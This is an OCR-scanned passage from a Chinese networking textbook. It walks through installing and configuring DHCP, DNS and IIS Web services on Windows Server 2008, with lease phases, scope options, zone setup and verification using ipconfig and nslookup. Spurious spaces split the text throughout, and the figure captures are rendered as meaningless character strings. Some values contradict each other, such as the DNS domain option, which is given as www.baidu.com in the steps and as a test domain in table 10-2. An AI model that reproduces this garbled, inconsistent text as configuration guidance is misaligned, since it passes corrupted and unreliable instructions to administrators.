算 机 名 , 单 击 “ 添 加 ”一 “确认 ”。 

在 这 里 设置 用 户 账 号 可 以 从 域 中 的 哪些 工作 站 上 登录 到 域 。 默 认 情 况 下 用 户 可 以 登录 
到 域 中 的 所 有 计算 机 , 即 一 个 域 中 的 账号 可 以 从 域 中 的 所 有 工作 站 上 登录 到 域 。 这 样 给 用 
户 带 来 方便 的 同时 却 在 管理 上 带 来 了 很 多 不 便 。 

利用 该 选项 也 可 以 达到 每 个 用 户 账号 只 能 使 用 自己 的 计算 机 ,而 不 能 用 别人 的 计算 机 
的 目的 。 


10.3 ”Windows Server 2008 服务 的 配置 与 应 用 


10.3.1 DHCP 服务 的 配置 与 应 用 


1. DHCP 服务 的 介绍 


1) DHCP 服务 简介 
DHCP 是 BOOTP 的 扩展 ,是 基于 C-S 模式 的 . 它 提供 了 一 种 动态 指定 IP 地 址 和 配置 
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参数 的 机 制 。 这 主要 用 于 大 型 网 络 环境 和 配置 比较 困难 的 地 方 。DHCP 服务 器 自动 为 客 
户 机 指定 IP 地 址 ,有 些 指定 的 配置 参数 和 IP 协议 并 不 相关 ,但 这 并 没有 关系 , 它 的 配置 参 
数 使 得 网 络 上 的 计算 机 通信 变 得 方便 而 容易 实现 了 。DHCP 使 IP 地 址 可 以 租用 ,这 对 于 许 
多 拥有 许多 台 计算 机 的 大 型 网 络 来 说 ,每 台 计 算 机 拥有 一 个 IP 地 址 有 时 候 可 能 是 不 必要 
和。 当 租 期 到 了 的 时 候 ,服务 器 可 以 把 这 个 IP 地 址 分 配给 别 的 机 器 使 用 。 客 户 也 可 以 请 求 
使 用 自己 喜欢 的 网 络 地 址 及 相应 的 配置 参数 。 

2) DHCP 工作 原理 

DHCP 客户 端 首次 登录 网 络 时 ,主要 通过 4 个 阶段 与 DHCP 服务 器 建立 联系 。 

(1) 发 现 阶 段 : 即 DHCP 客户 端 寻 找 DHCP 服务 器 的 阶段 。 客 户 端 以 广播 方式 发 送 
DHCPDiscover 报 文 ,该 报 文 只 有 DHCP 服务 器 才 会 进行 响应 。 

(2) 提供 阶段 : 即 DHCP 服务 器 提供 IP 地 址 的 阶段 。DHCP 服务 器 接收 到 客户 端的 
DHCPDiscover 报 文 后 ,从 IP 地 址 池 中 挑选 一 个 尚未 分 配 的 IP 地 址 分 配给 客户 端 ,向 该 客 
户 端 发 送 包含 出 租 IP 地 址 和 其 他 设置 的 DHCPOffer 报 文 (此 时 服务 器 就 分 给 客户 端 一 个 
IP, 此 时 也 可 能 不 只 一 个 服务 器 回应 DHCPOffer)。 

(3) 选择 阶段 : 即 DHCP 客户 端 选择 IP 地 址 的 阶段 。 如 果 有 多 台 DHCP 服务 器 向 该 
客户 端 发 来 DHCPOffer 报 文 ,客户 端 只 接受 第 一 个 收 到 的 DHCPOffer 报 文 ,然后 以 广播 
方式 向 各 DHCP 服务 器 回应 DHCPRequest 报 文 ,该 信息 中 包含 向 所 选 定 的 DHCP 服务 器 
请 求 IP 地 址 的 内 容 。 

(4) 确认 阶段 : 即 DHCP 服务 器 确认 所 提供 IP 地 址 的 阶段 。 当 DHCP 服务 器 收 到 
DHCP 客户 端 回答 的 DHCPRequest 报 文 后 , 便 向 客户 端 发 送 包 含 它 所 提供 的 IP 地 址 和 其 
他 设置 的 DHCP_ACK 确认 报 文 。 然 后 ,DHCP 客户 端 将 其 TCP/IP 组 件 与 网 卡 绑 定 。 

3) DHCP 的 优点 

DHCP 服务 为 管理 基于 TCP/IP 的 网 络 提供 了 以 下 三 方面 的 优点 。 

(1) 提供 了 安全 而 可 靠 的 配置 。DHCP 避免 了 由 于 需要 手动 在 每 个 计算 机 上 输入 IP 
地 址 而 引起 的 配置 错误 。DHCP 还 有 助 于 防止 由 于 在 网 络 上 配置 新 的 计算 机 时 重用 以 前 
指派 的 IP 地 址 而 引起 的 地 址 冲突 。 

(2) 减少 了 配置 管理 时 间 。 使 用 DHCP 服务 器 可 以 大 大 减少 用 于 配置 和 重新 配置 网 
上 计算 机 的 时 间 。 

(3) DHCP 租约 续 订 过 程 还 有 助 于 确保 客户 端 计 算 机 配置 需要 经 常 更 新 的 情况 (如 使 
用 移动 或 便携 式 计 算 机 频繁 更 改 位 置 的 用 户 ) ,通过 客户 端 计算 机 直接 与 DHCP 服务 器 通 
信 可 以 高 效 、 自 动 地 进行 这 些 更 改 。 

2. DHCP 服务 的 安装 

在 Windows 2008 上 安装 DHCP 服务 ,有 以 下 两 种 方法 。 

(1) 通过 “程序 和 功能 ”安装 DHCP 服务 ,详细 步骤 如 下 。 

@ 选择 “开始 "一 “控制 面板 ”程序 和 功能 ”, 然 后 单 击 “ 打 开 或 关闭 Windows 功能 ”， 
服务 器 管理 器 主页 中 的 命令 将 打开 “添加 功能 向 导 ”。 

@ 展开 “远程 服务 器 管理 工具 ”一 “角色 管理 工具 ”列表 ,选中 “DHCP 服务 器 工具 ”, 单 
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击 “ 下 一 步 ” 按 钮 进入 “确认 安装 选择 ”界面 。 

@ 单 击 “ 安 装 ” 按 钮 进行 安装 ,然后 进入 “安装 完成 "界面 , 单 击 “ 完 成 ”按钮 完成 安装 。 

(2) 通过 “服务 器 管理 器 "安装 DHCP 服务 ,操作 过 程 如 下 。 

@ 选择 “开始 ”一 “管理 工具 ”服务 器 管理 ", 打 开 * 服 务 器 管理 ”窗口 。 单 击 * 角 色 ? 选 
择 “ 添 加 角色 ”项 ,进入 “开始 之 前 ”界面 ,根据 提示 进行 相关 准备 工作 。 

@ 单 击 “下 一 步 ?按钮 ,如 图 10-11 所 示 。 选择 “DHCP 服务 器 ”, 单 击 “ 下 一 步 ”按钮 , 进 
和 人 “DHCP 服务 器 ”界面 。 

@ 单 击 “ 下 一 步 " 按 钮 ,进入 “指定 IPv4 DNS 服务 器 设置 "界面 ,指定 父 域 和 首选 DNS 
服务 器 IPv4 地 址 。 

@ 单 击 “ 下 一 步 ” 按 钮 ,进入 “指定 IPv4 WINS 服务 器 设置 "界面 ,选择 “此 网 络 上 的 应 
用 程序 不 需要 WINS”。 

@@ 单 击 “ 下 一 步 "按钮 ,进入 *DHCP 作用 域 ”界面 。 

@@ 单 击 “ 下 一 步 ”" 按 钮 ,进入 “配置 DHCPv6 无 状态 模式 ”界面 。 

@ 单 击 “ 下 一 步 ” 按 钮 ,进入 “指定 IPv6 DNS 服务 器 设置 ?界面 。 

单 击 “ 下 一 步 ” 按 钮 ,进入 “授权 DHCP 服务 器 ”界面 。 

加 单 击 “下 一 步 ?按钮 ,进入 “确认 安装 选择 ”界面 , 单 击 * 安 装 ?按钮 。 

安装 完成 后 可 创建 作用 域 ,创建 作用 域 的 工作 可 以 通过 DHCP 管理 控制 台 来 进行 , 因 
此 配置 作用 域 将 在 后 面 讲解 。 


ETEEE x 


ES 所 述 : 
DHCP 服务 器 DD Active Directory Riehts Wanagenent Services 让 
IPv4 DNS 设置 E Active Directory A a ee 
= Active Directory 轻型 目录 服务 
JPv4 WINS 设置 ti tory 域 服务 ”已 安 装 
DWCP 作用 域 tory 证 书 服务 
THCPw6 无 杖 态 模式 
TPv6 DIS 设置 
DHCP 服务 器 授权 
确认 
进度 
结果 NR 
有 关 服 务 器 角色 的 洋 细 信息 
<《 上 一 步 P lm | #7 | mel 


10-11 服务 器 角色 选择 界面 


3. DHCP 服务 的 验证 
DHCP 服务 安装 成 功 后 ,可 以 通过 两 种 方法 验证 安装 。 
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1) 查看 文件 

如 果 DHCP 安装 成 功 ,将 在 %systemroot%\system32 文件 夹 下 自动 创建 一 个 名 为 
dhcp 的 文件 夹 , 其 中 包含 DHCP 数据 库 文件 .日 志文 件 等 。 

2) 查看 服务 

DHCP 服务 安装 成 功 后 ,会 自动 启动 。 因 此 ,在 服务 列表 将 能 够 查看 已 启动 的 DHCP 
服务 。 选 择 “ 开 始 ”一 “管理 工具 ”>“ 服 务 ”, 打 开 “ 服 务 ”窗口 (或 者 右键 单 击 “ 计 算 机 ”一 “ 管 
理 ”, 进 入 “服务 器 管理 ”, 展 开 “ 配 置 ”, 在 列表 中 选择 “服务 ”命令 ) ,在 此 能 够 查看 已 启动 的 
DHCP 服务 。 

4. DHCP 服务 的 配置 

作为 一 名 网 络 管理 人 员 应 该 养 成 对 任何 工作 都 进行 事前 计划 的 良好 习惯 ,并 将 计划 形 
成 文档 。 事 前 计划 不 仅 能 够 有 效 地 指导 信息 系统 的 建设 ,而 且 还 能 为 解决 信息 系统 运行 过 
程 中 出 现 的 问题 提供 必要 的 资料 和 证 据 。 在 实际 工作 中 ,IP 地 址 规划 是 整体 信息 系统 规划 
的 一 个 组 成 部 分 。 如 果 采 用 DHCP 服务 自动 分 配 IP 地 址 ,在 规划 中 还 应 明确 哪些 IP 地 址 
用 于 自动 分 配给 客户 端 ,哪些 IP 地 址 用 于 手工 指定 给 特定 的 服务 器 。 在 下 面 的 配置 过 程 
中 ,将 IP 地址 192.168.1.11 一 254/24 用 于 自动 分 配 ,将 IP 地 址 192.168.1.1 一 10/24 预 留 
给 需要 手工 设置 TCP/IP 参数 的 服务 器 。 详 细 步 骤 如 下 。 

(1) 选择 “开始 ”管理 工具 ”>~DHCP, 打 开 DHCP 管理 控制 台 , 如 图 10-12 所 示 。 

(2) 右键 单 击 IPv4( 或 IPv6) 服 务 器 ,选择 “新 建 作 用 域 ”, 接 着 单 击 * 下 一 步 ?按钮 ,在 弹 
出 的 界面 中 输入 相关 名 称 和 描述 。 


文件 全 操作 只) 查看 w) 帮助 00) 
和 中 | 轴 加 | 加 GI 晶 可 | 叫 


id 
要 添加 一 个 新 作用 域 ， 请 在 “操作 ” 荣 单 下 单 击 “ 新 建 作用 域 ”。 
有 关 设 置 DHCP 服务 器 的 详细 情 品 ， 请 参阅 联机 帮助 。 


图 10-12 DHCP 控制 台 界面 
(3) 单 击 “ 下 一 步 ” 按 钮 ,如 图 10-13 所 示 ,输入 IP 地 址 范围 。 


(4) 单 击 “ 下 一 步 ” 按 钮 ,输入 排除 的 地 址 范围 。 
(5) 单 击 “下 一 步 ” 按 钮 ,进入 “租约 期 限 ”, 选 择 默 认 , 通 过 此 对 话 框 可 设置 IP 地 址 的 租 
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[和 于 作用 


地 址 范围 
您 通过 确定 组 连续 的 I 地址 未 定义 作用 域 地 址 范围 。 


输入 此 作用 域 分 本 地址 范围 。 
开 才 下 地 直 S |152 168 1 .1 
[IE 


四/ 了 网 也 ,多少 位 用 作 主 机 功 。 您 


长 度 0 FE 习 
子 网 搞 码 轴 - 255 .255 .255 . 0 


= 


图 10-13 IP 地址 范围 界面 


约 期 限 ,最 长 期 限 为 999 天 23 小 时 59 分 ,在 此 处 不 能 设置 为 无 限制 (在 配置 完成 后 右键 单 
击 “ 作 用 域 ”, 选 择 “ 属 性 ”命令 ,可 将 租约 设置 为 无 限期 )。 

(6) 单 击 “ 下 一 步 ” 按 钮 ,在 弹出 的 界面 中 选择 “ 否 , 我 想 稍 后 配置 这 些 选 项 ”, 并 单 击 “ 下 
一 步 ” 按 钮 ,进入 完成 界面 单 击 “ 完 成 "按钮 。 

(7) 右键 单 击 作用 域 选择 “激活 "命令 ,如 图 10-14 所 示 , 颜 色 由 “红色 ” 变 为 “绿色 ” 即 激 
活 成 功 。 

= 
文件 四 损 作 查看 VW 帮助 0 


各 四 | 方 [| 日 GBIB 可 | 


10-14 DHCP 控制 台 界面 


(8) 作用 域 选项 配置 ,右键 单 击 “ 作 用 域 ”选项 ,选择 “配置 ”选项 ,选中 “003 路 由 器 ”, 输 
入 IP 地 址 192. 168. 1.2, 如 图 10-15 所 示 。 

(9) 依次 选中 006、015、044、 输 入 IP 地 址 或 服务 器 名 ,依次 输入 192. 168. 1. 3、www. 
baidu. com、192. 168. 1. 4, 如 表 10-2 所 示 。 
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EE 
常规 | 高 级 | 
了 CT 偏差 以 筷 为 单 人 
按 优先 顺序 排 耻 
按 优先 顺序 排 5J8 
” 
数据 而 
服务 器 名称 5); 
解 牧 EY 
ba 一 一 
睛 二 
区 本 | 
图 10-15 配置 作用 域 选项 界面 
表 10-2 路 由 选项 说 明 
选项 代码 选项 说 明 输入 参数 
003 路 由 器 192.168.1.2 
006 DNS 服务 器 192. 168.1.3 
015 DNS 域名 www. testexample. com 
044 WINS 服务 器 192. 168.1.4 


(10) 最 后 查看 作用 域 选项 ,如 图 10-16 所 示 。 


文件 中。 操作 查看 W) 帮助 0 


工作 ESE TO) 


吉 015 Dks 域名 
吉 044 WIRS/NBNS 服务 器 


Es 作用 域 选 项 


日 目 vin-hevpgegzzy2. testexanp] 
Eopas) 


192.168.1.2 
192.168.1.3 
ww. bai du com 
192.168.1.4 


图 10-16 配置 作用 域 结果 界面 
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配置 完成 后 重新 启动 服务 ,使 最 新 最 近 的 配置 生效 。 

5. DHCP 服务 配置 的 验证 

选择 “开始 ”一 “运行 ”, 输 入 “ipconfig/release” 为 手动 释放 IP 地 址 ,“ipconfig/renew” 为 
重新 获取 IP 地 址 ,用 “ipconfig/all” 查 看 TCP/IP 信息 ,结果 如 图 10-17 所 示 。 


中 管理 员 : c: \vindovs\systen32\ena exe 


|windows IP 本 过 


FE ea re R ong MT Network Connection 
9. | 
Bn Sie 
ba) 地 址 ，。。。 2001:250:1403:1007: 听 7b:6d74:dcdc:f20d( 首 
本 地 链接 IPv6 地 址 :57b;| 和) 
v4 埠 址 ，。，。 62.253.250 
和， 调 1 旧 22:28:08 
上 上 4:26:02 


0 21: 803cy10 
2 


TCPIP 上 的 NetBIOS 
接 直 过 机关 本 地 诗 接 #: 


tap， 记 负 
ion 


: 2001:250:1403:3:0:5efe:192.168.259.250( 菌 


efe: 192.168.253.250X12( 菌 选 ) 
和 ef e202.201.31.234X12 国 


图 10-17 客户 端 IP 信息 


10.3.2 DNS 服务 的 配置 与 应 用 


1. DNS 服务 简介 

DNS 是 Domain Name System( 域 名 系统 ) 的 缩写 ,该 系统 用 于 命名 组 织 到 域 层 次 结构 
中 的 计算 机 和 网 络 服务 。DNS 命名 用 于 Internet 等 TCP/IP 网 络 中 ,通过 用 户 名 称 友好 的 
查找 为 计算 机 用 户 提供 服务 。 当 用 户 在 应 用 程序 中 输入 DNS 名 称 时 ,DNS 服务 可 以 将 此 
名 称 解 析 为 与 之 相关 的 其 他 信息 ,如 IP 地 址 。 

2. DNS 服务 的 查询 模式 

DNS 服务 的 查询 模式 主要 有 两 种 ,下 面 分 别 给 予 介绍 。 

递归 查询 : 递归 查询 通常 在 DNS 客户 端 向 服务 器 端 发 送 解析 请 求 时 使 用 。 当 服务 器 
端 接 收 到 客户 端的 递归 查询 请 求 后 ,当前 DNS 服务 器 只 会 向 客户 端 返回 两 种 信息 : 一 种 是 
在 该 DNS 服务 器 上 查询 到 的 结果 , 另 一 种 是 查询 失败 的 信息 。 如 果 当 前 DNS 服务 器 中 无 
法 解析 名 称 , 它 并 不 会 告诉 客户 端 其 他 可 能 的 DNS 服务 器 ,而 是 自行 向 其 他 服务 器 查询 并 
完成 解析 。 

迭代 查询 : 迭代 查询 通常 在 一 台 DNS 服务 器 向 另 一 台 DNS 服务 器 发 出 解析 请 求 时 使 
用 ,如 果 当 前 DNS 收 到 其 他 服务 器 发 来 的 迭代 查询 请 求 , 并 且 不 能 在 本 地 查询 到 所 需要 的 
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数据 , 则 当前 DNS 服务 器 将 向 发 起 查询 的 DNS 服务 器 发 送 另 一 台 DNS 服务 器 的 IP 地址， 
然后 再 由 发 起 查询 的 DNS 服务 器 自行 向 另 一 台 DNS 服务 器 发 起 查询 。 

3. DNS 服务 的 安装 

在 Windows 2008 中 可 以 通过 两 种 方法 来 安装 DNS 服务 。 

1) 通过 “程序 和 功能 ”安装 DNS 服务 

详细 步骤 如 下 。 

(1) 选择 “开始 ”>“ 控 制 面板 ”一 “程序 和 功能 ”, 然 后 单 击 “ 打 开 或 关闭 Windows 功 
能 ”, 服 务 器 管理 器 主页 中 的 命令 将 打开 “添加 功能 向 导 ”。 

(2) 展开 “远程 服务 器 管理 工具 ”>“ 角 色 管 理工 具 ” 列 表 , 选 中 “DNS 服务 器 工具 ”, 单 
击 “ 下 一 步 ” 按 钮 进入 “确认 安装 选择 ”界面 。 

(3) 单 击 “ 安 装 ” 按 钮 进行 安装 ,然后 进入 “安装 完成 "界面 , 单 击 “ 完 成 ”按钮 完成 安装 。 

2) 通过 “服务 器 管理 器 ”安装 DNS 服务 

详细 安装 过 程 如 下 。 

(1) 选择 “开始 ”一 “管理 工具 ”一 “服务 器 管理 ”, 打 开 “ 服 务 器 管理 ”窗口 。 单 击 “ 角 色 ” 
选择 “添加 角色 ”项 ,进入 “开始 之 前 ”界面 ,连续 单 击 “ 下 一 步 ” 按 钮 ,直到 如 图 10-18 所 示 ,并 
选中 “DNS 服务 器 ”。 


和 加 角色 向 导 x| 


| 讼 选择 服务 器 角色 
开始 之 前 


选择 要 安装 在 此 服务 器 上 的 一 个 或 多 个 角色 。 
务 器 角色 角色 吧 )- 据 述 : 
DNS 服务 器 [Active Directory Rights Wanagenent Services 十 各 系统 (hE) 服务 器 为 TCF/TP 网 
Et 日 hetive Direetory 联合 身份 和 证 服务 Pt 
口 hetive Directory 轻型 目录 服务 一 服务 崔 上 时 更 另 十 管理 * 如 果 旋 
进度 Aet tory 域 服务 ”已 安装 ) 择 Active Directory 域 服务 角 
1 DRS 服务 器 
乡 归 EN i 
工作 。 
有 关 服 务 关 角 名 A 各 信息 
E 《 上-- 步 p) | 下 -机 > #0 | mM | 


10-18 角色 选择 界面 


(2) 单 击 * 下 一 步 ?按钮 ,进入 "DNS 服务 器 ?界面 。 

(3) 单 击 “下 一 步 ?按钮 进入 “确认 安装 选择 ?界面 , 单 击 * 安 装 ” 按 钮 将 开始 安装 DNS 
服务 。 

配置 DNS 的 工作 可 以 通过 DNS 管理 控制 台 来 进行 ,因此 配置 作用 域 将 在 下 面 讲解 。 


280 网 络 安全 教程 及 实践 


4. DNS 服务 的 验证 

DNS 服务 安装 成 功 后 ,可 以 通过 两 种 方法 验证 安装 。 

1) 查看 文件 

如 果 DNS 安装 成 功 ,将 在 %systemroot%\system32 文件 夹 下 自动 创建 一 个 名 为 dns 
的 文件 夹 ,其 中 包含 DNS 数据 库 文件 和 日 志文 件 等 。 

2) 查看 服务 

DNS 服务 安装 成 功 后 ,会 自动 启动 。 因 此 ,在 服务 列表 中 将 能 够 查看 已 启动 的 DNS 服 
务 。 选 择 “ 开 始 ” 一 “管理 工具 ”一 “服务 ”, 打 开 “ 服 务 ”窗口 (或 者 右键 单 击 “ 计 算 机 ”一 “ 管 
理 ”, 进 入 “服务 器 管理 ”, 展 开 “ 配 置 ”, 在 列表 中 选择 “服务 ”命令 ) ,在 此 能 够 查看 已 启动 的 
DNS 服务 。 

5. DNS 服务 的 配置 

上 述 工作 无 误 后 ,说 明 DNS 安装 成 功 , 接 下 来 可 以 进行 DNS 服务 的 配置 了 。 详 细 配置 
步骤 如 下 。 

(1) 选择 “开始 ”一 “管理 工具 ”~DNS, 打 开 DNS 管理 控制 台 。 

(2) 右键 选中 正 向 查找 区 域 .选择 “新 建 区 域 " 复 选 框 。 

(3) 单 击 “ 下 一 步 " 按 钮 ,选中 “主要 区 域 " 复 选 框 。 

(4) 单 击 “下 一 步 ? 按 钮 ,选中 * 至 此 域 中 的 所 有 DNS 服务 器 " 复 选 框 。 

(5) 单 击 “ 下 一 步 ” 按 钮 ,进入 “区 域名 称 ” 界 面 ,输入 “testexample2. com. ”。 

(6) 单 击 * 下 一 步 ” 按 钮 ,直到 完成 界面 , 单 击 “ 完 成 ”按钮 。 

(7) 右键 选中 testexample2 选项 ,选择 “新 建 主 机 "命令 ,如 图 10-19 所 示 。 输 入 主机 名 
和 IP 地 址 ,并 单 击 “ 添 加 主机 ”按钮 ,接着 单 击 “确定 ”按钮 。 

(8) 布 键 选中 “ 反 向 查找 区 域 ”, 选 择 “ 新 建 区 域 "命令 , 单 击 “ 下 一 步 ” 按 钮 ,直到 如 图 10-20 
所 示 , 输 入 网 络 号 , 单 击 “ 下 一 步 ” 按 钮 ,直到 完成 界面 ,并 单 击 “ 完 成 ”按钮 。 


sersss 过 
EEC xx 反 向 查找 区 域名 称 
人 | | 反问 查找 区 域 将 IF 地 址 转 接 为 DIS 名称。 
名 称 朵 为 空 则 使 用 其 父 域名 称 ) 0 】 
要 标 训 反 向 查找 区 域 ， 请 乱入 网 络 ID 或 区 域名 称 。 
完全 合格 的 域名 an 6 网 络 茵 可; 
rw_ testexample2. com. 192 .168 .1 
TP 地 址 中): 随 到 是 属于 请 区 域 王 地 的 部分 * 用 正常 环 是 反 疝 的) 顺序 输入 
192. 166.1.3 人 
厂 他 相关 的 撒 针 FTNU 记 录 a bey a 
三 人 让 Pe 有 者 各 向 更新 Pe 
I 1 .68. 192. iaradir srpu 
和 — wh | 
10-19 添加 主机 界面 图 10-20 创建 反 向 查找 区 域 


(9) 在 反 向 区 域 中 ,右键 选中 192. 168. 1. x Subnet, 选 中 “新 建 指针 ”命令 ,如 图 10-21 
所 示 , 输 入 服务 器 的 IP 地 址 的 主机 号 和 主机 名 , 单 击 “ 确 定 ” 按 钮 ,创建 完成 。 
配置 完成 后 ,重新 启动 DNS 服务 , 则 最 新 的 配置 生效 。 
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6. DNS 服务 配置 的 验证 


右键 单 击 DNS 服务 器 名 ,选择 “启动 nslookup” 命 令 ,进行 正 反 解析 ,验证 结果 如 图 10-22 
所 示 ,说 明 配 置 成 功 。 


四 新 建 资源 记录 对 
指针 TR) | 
主机 匡 地 址 虽 ): 
州 国 1.165.1.3 C: MWINDOYS\systen32\cnd. exe - C: WINDOTSNS 
， 完全 合格 的 域名 gD) 中): YE Server: wuu.testexanple.com 
BL 168. 192, in-adir erps | Adress: 192.168.1.3 
1 主机 名 0 > 192.168.1.3 
[rm testexanple2. em erver: www.testexanple.con 
ddress: 192.168.1.3 
ame wu .testexanple .com 
二 ddress: 192.168.1.3 
A We 
erver: www.testexanple.con 
Adress: 192.168.1.3 
Poms wuu.testexanple .con 
ddress: 192.168.1.3 
>-= 
We | mi | 
图 10-21 创建 指针 界面 图 10-22 ”启用 nslookup 测试 界面 


10.3.3 ”Web 服务 的 配置 与 应 用 


1. Web 服务 介绍 

Web 服务 是 Internet 中 最 为 重要 的 应 用 , 它 是 实现 信息 发 布 .资料 查询 ,数据 处 理 和 视 
频 点 播 等 诸多 应 用 的 平台 ,其 采用 超级 链接 (Hypertext) 的 方式 ,将 信息 通过 Internet 传递 
到 世界 各 地 。 下 面 简单 说 明 一 下 HTTP。 

HTTP 是 应 用 层 协议 , 主要 用 于 分 布 式 ,协作 的 信息 系统 。HTTP 是 通用 的 、 无 状态 
的 。 其 系统 的 建设 和 传输 的 数据 无 关 。HTTP 也 是 面向 对 象 的 协议 ,可 用 于 各 种 任务 , 包 
括 名 字 服 务 、 分 布 式 对 象 管理 .请求 方 法 的 扩展 命令 等 。 在 Internet 上 ,HTTP 通信 往往 发 
生 在 TCP/IP 链接 上 ,其 默认 端口 为 80 ,也 可 以 使 用 其 他 端口 。 

在 网 络 环境 中 部 署 Web 服务 应 该 主要 满足 下 面 4 方面 的 要 求 。 

(1) 使 用 内 置 了 IIS 以 提供 Web 服务 的 Windows Server 2008 标准 版 ,企业 版 .数据 中 
心 版 和 Web 版 等 服务 器 端 操作 系统 。 

(2) 由 于 要 为 Web 客户 端 提供 Web 服务 ,因此 Web 服务 器 的 IP 地 址 、 子 网 掩 码 等 
TCP/IP 参数 应 手工 设置 。 

(3) 为 了 能 更 好 地 为 客户 端 提供 服务 ,Web 站 点 应 该 有 一 个 容易 记忆 的 DNS 名 称 , 并 
且 能 够 被 正常 解析 ,以 便 用 户 能 通过 域名 访问 Web 站 点 。 

(4) Web 页 面 是 客户 端 真正 访问 的 内 容 , 通 过 Web 页 面 可 以 提供 各 种 可 能 的 信息 ,使 
用 相关 工具 将 需要 提供 给 客户 端的 信息 编辑 到 页 面 中 。 

2. Web 服务 的 安装 


在 Windows 2008 上 安装 Web 服务 ,有 两 种 安装 方法 。 
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1) 通过 “程序 和 功能 ”安装 IIS 服务 

详细 步 又 如 下 。 

(1) 选择 “开始 ”一 控制 面板 ”程序 和 功能 ”, 然 后 单 击 “ 打 开 或 关闭 Windows 功 
能 ”。 服 务 器 管理 器 主页 中 的 命令 将 打开 “添加 功能 向 导 ”。 

(2) 展开 “远程 服务 器 管理 工具 ”一 “角色 管理 工具 ”列表 ,选中 “Web 服务 器 (IIS) 工 
具 ”, 单 击 “ 下 一 步 ”按钮 进入 Web 服务 器 (IIS)” 界 面 。 

(3) 单 击 “ 下 一 步 ” 按 钮 进入 “角色 选择 服务 界面 ", 选 择 *ASP. NET” 以 及 有 关 IIS 的 一 
些 管理 工具 , 单 击 “ 下 一 步 ”按钮 进入 “确认 安装 选择 ”界面 。 

(4) 单 击 “ 安 装 ” 按 钮 进行 安装 ,然后 进入 “安装 完成 "界面, 单 击 “ 完 成 ”按钮 完成 安装 。 

2) 通过 “服务 器 管理 器 ”安装 IIS 服务 

详细 安装 过 程 如 下 。 

(1) 选择 “开始 ”一 “管理 工具 ”->“ 服 务 器 管理 器 ”, 打 开 “ 服 务 器 管理 器 ”窗口 。 单 击 “ 角 
色 ” 选 择 “ 添 加 角色 ”项 ,进入 “开始 之 前 ”界面 ,连续 单 击 “ 下 一 步 ” 按 钮 ,直到 如 图 10-23 所 
示 , 并 选中 “Web 服务 器 ”。 

(2) 单 击 “ 下 一 步 ” 按 钮 直至 出 现 “ 选 择 角色 服务 ”界面 (图 10-23) ,选择 ASP. NET“IIS 
管理 控制 台 ” 及 “IIS 6 管理 兼容 性 ”, 单 击 “ 下 一 步 ” 按 钮 进入 “确认 安装 选择 ”界面 。 

(3) 单 击 “ 安 装 ” 按 钮 进行 安装 ,然后 进入 “安装 完成 "界面 , 单 击 “ 完 成 "按钮 完成 安装 。 


添加 角色 向 导 EE 


i 选择 角色 服务 


开始 之 前 选择 为 Yeh 服务 器 TIS) 安装 的 角色 服务: 

服务 器 角色 角色 服务 四 : : 

上 ASP_ NET 衣 过 使 用 托管 代码 为 板 
网 站 和 eb 应 用 程序 服务 尖 江 提 

a es 

日 并 不 仅仅 旦 ASP 的 一 个 新 版 本 。 经 

确认 a sr | 这 台 


供 基 于 .JET i 3 


《上 一 步 四 |F SV»| 取消 
图 10-23 角色 选择 界面 


3. Web 服务 的 验证 
Web 服务 安装 成 功 后 ,可 以 通过 两 种 方法 验证 安装 。 
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1) 查看 文件 

如 果 Web 安装 成 功 ,将 在 %systemdrive%\ 中 自动 创建 一 个 名 为 Inetpub 的 文件 夹 ,其 
中 包含 wwwroot 子 文件 夹 ,% systemdrive%% 是 系统 变量 .所 代表 的 值 为 Windows Server 
2008 的 硬盘 分 区 。 如 果 将 Windows Server 2008 安装 在 C 分 区 , 则 %systemdrive% 所 代表 
值 为 C:。 

2) 查看 服务 

Web 服务 安装 成 功 后 ,会 自动 启动 。 因 此 ,在 服务 列表 中 将 能 够 查看 到 已 启动 的 Web 
服务 。 选 择 “ 开 始 ” 一 “管理 工具 ”一 “服务 ”, 打 开 “ 服 务 ” 窗 口 ( 或 者 右键 单 击 “ 计 算 机 ”一 “ 管 
理 ”, 进 入 “服务 器 管理 ”, 展 开 “ 配 置 ”, 在 列表 中 选择 “服务 ”命令 ) ,在 此 能 够 查看 已 启动 的 
Web 服务 。 

4. Web 服务 的 配置 

上 述 工作 无 误 后 ,说 明 Web 安装 成 功 , 接 下 来 可 以 进行 Web 服务 的 配置 了 。 详 细 配 置 
步骤 如 下 。 

(1) 选择 “开始 ”管理 工具 ”一 ”管理 您 的 服务 器 ,打开 “管理 您 的 服务 器 ”窗口 ,选择 
“管理 此 应 用 程序 服务 器 ”( 也 可 以 选择 “开始 ”一 “运行 ”, 输 入 “inetmgr”, 按 Enter 键 ), 如 
图 10-24 所 示 , 展开 “Internet 信息 服务 (IIS) 管 理 器 ”。 


关中 Tat ernet 信息 服务 
WIN-HEV 
1- 回 夺 |@ 全 ER | ss 
而 起 由 页 重新 启动 
= Se 分 组 依据 》 启动 
eT ASP_ MET S| | fst 
由 全 Default Wob Site > [9 查看 应 用 程序 地 
A 查看 网 站 
JET WI 
编译 全 球 化 国友 助 
联机 必 助 
号 ”加 
wr Sm 昌隆 
会 话 杖 态 。 计算 机 密 钥 
到 
二 | 中 国 二 a 因 ]， 内 容 视 图 
就 结 三 :; 


10-24 “Internet 信息 服务 (IIS) 管 理 器 ”界面 


(2) 布 键 选中 “网 站 ”, 选 择 “ 新 建 ”>“ 网 站 ”, 单 击 “ 下 一 步 ” 按 钮 ,进入 “网 站 描述 ”界面 ， 
输入 网 站 的 描述 (可 以 为 空 ) ,在 这 里 输入 *New web”。 

(3) 单 击 * 下 一 步 ? 按 钮 ,进入 “网 站 创建 向 导 ? 界 面 ,在 此 界面 中 输入 服务 器 的 IP 地 址 
和 端口 号 ,如 果 有 主机 头 (1IS 中 对 域名 绑 定 的 功能 ) 也 在 此 输入 ,如 果 没 有 ,在 创建 完成 后 
可 以 重新 设置 。 

(4) 单 击 * 下 一 步 ? 按 钮 ,进入 "网 站 主 目录 ”界面 ,在 此 界面 可 以 设置 目录 路 径 , 即 文档 
存放 的 位 置 ,还 可 以 设置 网 站 的 主 目录 是 否 允 许 以 匿名 方式 访问 (大 多 数 网 站 的 建立 是 为 了 
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公开 发 布 信息 ,因此 通常 都 允许 匿名 访问 ) 。 

(5) 单 击 “下 一 步 ?按钮 ,设置 网 站 访问 权限 ,管理 员 根 据 自己 的 实际 情况 选择 相应 的 权 
限 复 选 框 。 单 击 * 下 一 步 ? 按 钮 ,直到 完成 界面 , 单 击 “ 完 成 ?按钮 。 

5. Web 属性 的 设置 

